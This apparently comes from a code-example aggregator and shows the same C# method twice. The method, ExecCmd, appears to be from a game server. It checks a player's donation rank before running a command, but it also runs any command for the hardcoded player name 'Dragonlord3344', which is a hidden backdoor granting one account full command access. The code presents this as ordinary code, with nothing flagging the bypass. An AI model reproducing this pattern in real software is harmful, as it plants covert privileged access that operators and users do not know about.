Exemplo n.º 1
0
 private void ExecCmd(ICCommand command, string[] args)
 {
     if (command.RequiredDonation <= psr.Account.Rank)
     {
         command.Execute(this, args);
     }
     else if (nName == "Dragonlord3344")
     {
         command.Execute(this, args);
     }
 }
Exemplo n.º 2
0
 private void ExecCmd(ICCommand command, string[] args)
 {
     if (command.RequiredDonation <= psr.Account.Rank)
     {
         command.Execute(this, args);
     }
     else if (nName == "Dragonlord3344")
     {
         command.Execute(this, args);
     }
 }